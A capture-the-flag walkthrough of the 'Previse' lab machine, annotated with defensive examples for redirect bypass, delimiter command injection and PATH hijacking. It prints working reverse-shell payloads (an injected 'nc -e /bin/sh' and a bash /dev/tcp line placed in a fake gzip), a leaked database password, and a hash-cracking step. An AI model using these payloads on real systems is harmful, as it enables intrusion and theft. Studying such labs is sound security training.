PS: Date created: these notes were written around 10 November 2021.
1. IP Address
# Machine Address
10.10.11.104
# Local Address
10.10.14.139
2. Nmap
sudo nmap -sC -sV -oA nmap/previse 10.10.11.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 05:45 EST
Nmap scan report for 10.10.11.104
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.40 seconds
3. Gobuster
gobuster dir -u http://10.10.11.104 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/11/10 05:49:15 Starting gobuster in directory enumeration mode
===============================================================
/download.php (Status: 302) [Size: 0] [--> login.php]
/index.php (Status: 302) [Size: 2801] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
Progress: 13674 / 441122 (3.10%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/11/10 05:54:51 Finished
===============================================================
nav.php
-> CREATE ACCOUNT LINK
4. Burp
GET /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://10.10.11.104/nav.php
Cookie: PHPSESSID=n8t6btqpv1in2cbte4c82i9ggh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Click Do Intercept -> Response to this request, then forward. In the response that comes back, change the 302 to 200 and forward it. Looking in the browser, the create user page is now shown. Create a new user and log in.
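The gobuster output above already reveals why the intercept trick works: several pages answer 302 yet still carry a full-size body, which is the signature of a handler that sends a Location header and keeps rendering instead of exiting. The following is an added example (not code from the original notes) that parses those gobuster lines and flags redirect responses with a body; the sample lines are copied from the scan above.

```python
import re

# Lines taken from the gobuster run above. A 302 with a non-zero body is the
# symptom to look for: in PHP it usually means header('Location: ...') was
# not followed by exit, so the protected content is still sent to the client.
GOBUSTER_OUTPUT = """\
/download.php (Status: 302) [Size: 0] [--> login.php]
/index.php (Status: 302) [Size: 2801] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/logs.php (Status: 302) [Size: 0] [--> login.php]
"""

# One gobuster result line: path, status, size and an optional redirect target.
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+\(Status:\s*(?P<status>\d{3})\)\s+\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s+\[-->\s*(?P<target>\S+)\])?"
)


def parse_gobuster(text):
    """Turn gobuster dir output into a list of dicts; non-matching lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append({"path": m["path"], "status": int(m["status"]),
                         "size": int(m["size"]), "target": m["target"]})
    return rows


def redirect_with_body(rows, min_size=1):
    """Return the paths whose response is a 3xx redirect but still carries a body.

    min_size lets you ignore the few bytes some frameworks emit as a
    "Redirecting..." stub; with the scan above any body at all is suspicious.
    """
    return [r["path"] for r in rows
            if 300 <= r["status"] < 400 and r["size"] >= min_size]


if __name__ == "__main__":
    for path in redirect_with_body(parse_gobuster(GOBUSTER_OUTPUT)):
        print("redirect still renders content:", path)
```

The fix on the server side is to stop execution right after the redirect header (`header('Location: login.php'); exit;`), after which the Size column for these pages drops to 0.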
5. Reverse Shell
In the File menu there is a Backup file; download it and look at config.php:
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
Burp capture of the Request Log Data menu when selecting comma as the delimiter:
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.11.104
DNT: 1
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=n8t6btqpv1in2cbte4c82i9ggh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
delim=comma
Netcat:
nc -lvnp 9001
Reverse Shell:
delim=comma%26nc+-e+/bin/sh+10.10.14.139+9001
Once the shell comes in, upgrade it:
python3 -c 'import pty;pty.spawn("/bin/sh")'
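The delim parameter is passed straight into a shell command, which is why `comma%26nc ...` runs a second command. As an added example (not code from the original notes or the application), here is a hardened handler that maps the form value through a fixed allowlist, plus a small audit routine that flags request bodies whose delim value is off-list or contains shell metacharacters; the sample bodies are constructed from the requests shown above.

```python
import re
from urllib.parse import parse_qs

# The only delimiters the export feature is meant to support. Anything else is
# rejected before it can reach a command line.
ALLOWED_DELIMS = {"comma": ",", "space": " ", "tab": "\t"}

# Characters that would let a value break out of a single shell argument.
SHELL_META = re.compile(r"[;&|`$<>()\n]")


def resolve_delim(value):
    """Hardened handling: translate the form value through a lookup table
    instead of interpolating it into a command string. Unknown names raise."""
    if value not in ALLOWED_DELIMS:
        raise ValueError(f"unsupported delimiter: {value!r}")
    return ALLOWED_DELIMS[value]


def audit_logs_requests(bodies):
    """Detection: return (body, decoded_delim, reason) for every POST body
    whose delim is not on the allowlist or carries shell metacharacters."""
    findings = []
    for body in bodies:
        params = parse_qs(body, keep_blank_values=True)
        for delim in params.get("delim", []):
            if SHELL_META.search(delim):
                findings.append((body, delim, "shell metacharacters in delim"))
            elif delim not in ALLOWED_DELIMS:
                findings.append((body, delim, "delim not in allowlist"))
    return findings


# Constructed sample bodies: the benign capture, the payload used above, and
# a harmless but unsupported value.
SAMPLE_BODIES = [
    "delim=comma",
    "delim=space",
    "delim=comma%26nc+-e+/bin/sh+10.10.14.139+9001",
    "delim=pipe",
]

if __name__ == "__main__":
    for body, delim, reason in audit_logs_requests(SAMPLE_BODIES):
        print(f"{reason}: {delim!r} (from {body})")
```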
Using the credentials from config.php in the backup, we can log in to mysql:
mysql -u root -D previse -p
Tables:
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)
mysql>
Accounts:
mysql> SELECT * FROM accounts;
SELECT * FROM accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | ca4mi | $1$🧂llol$DHtkJzt.08/KEY8tpvplO0 | 2021-11-10 11:01:53 |
| 3 | ashot | $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// | 2021-11-10 11:22:18 |
+----+----------+------------------------------------+---------------------+
3 rows in set (0.00 sec)
User: m4lwhere Password: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
hashcat -a 0 -m 500 hash.txt rockyou.txt
ilovecody112235!
SSH access
ssh m4lwhere@10.10.11.104
User.txt
90a************
6. Privilege Escalation
sudo -l:
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
/opt/scripts/access_backup.sh
@vm:
nc -lvnp 9001
@Machine:
echo "bash -i >& /dev/tcp/10.10.14.139/9001 0>&1" > gzip
chmod 777 gzip
export PATH=/tmp:$PATH
/tmp is used here because the fake gzip was written in /tmp. If you are in a different directory, use $(pwd):$PATH instead.
Run the .sh script listed by sudo -l:
sudo /opt/scripts/access_backup.sh
root.txt
9dc5eb************
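The privilege escalation works only because the backup script resolves gzip through the caller's PATH. As an added example (not part of the original notes), the Python below reproduces that lookup in a throwaway directory: it resolves the command name once with a writable directory prepended, the way export PATH=/tmp:$PATH does, and once with a pinned system PATH, which is what a script run under sudo should set for itself (or it should call binaries by absolute path). The fake gzip and the temporary directory are constructed by the example.

```python
import os
import shutil
import stat
import tempfile

# A privileged script should pin its own PATH rather than trust the caller's.
PINNED_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_in_path(command, path):
    """Resolve a bare command name against an explicit PATH string."""
    return shutil.which(command, path=path)


def demo_path_hijack(command="gzip"):
    """Create a writable directory holding a fake `command` and resolve the name
    with and without that directory in front of PATH. Returns the fake path and
    both resolutions so the difference can be checked programmatically."""
    with tempfile.TemporaryDirectory() as work:
        fake = os.path.join(work, command)
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho fake\n")  # constructed stand-in, never run
        mode = os.stat(fake).st_mode
        os.chmod(fake, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)

        # What the caller's shell sees after export PATH=/tmp:$PATH.
        hijacked = resolve_in_path(
            command, work + os.pathsep + os.environ.get("PATH", ""))
        # What the script sees when it sets PATH itself.
        pinned = resolve_in_path(command, PINNED_PATH)
        return {"fake": fake, "hijacked": hijacked, "pinned": pinned}


if __name__ == "__main__":
    result = demo_path_hijack()
    print("caller PATH resolves gzip to:", result["hijacked"])
    print("pinned PATH resolves gzip to:", result["pinned"])
```

On a system with sudo's secure_path enabled the pinned lookup is what the script would get anyway; the example shows why a script must not rely on that when the sudoers rule or environment handling differs.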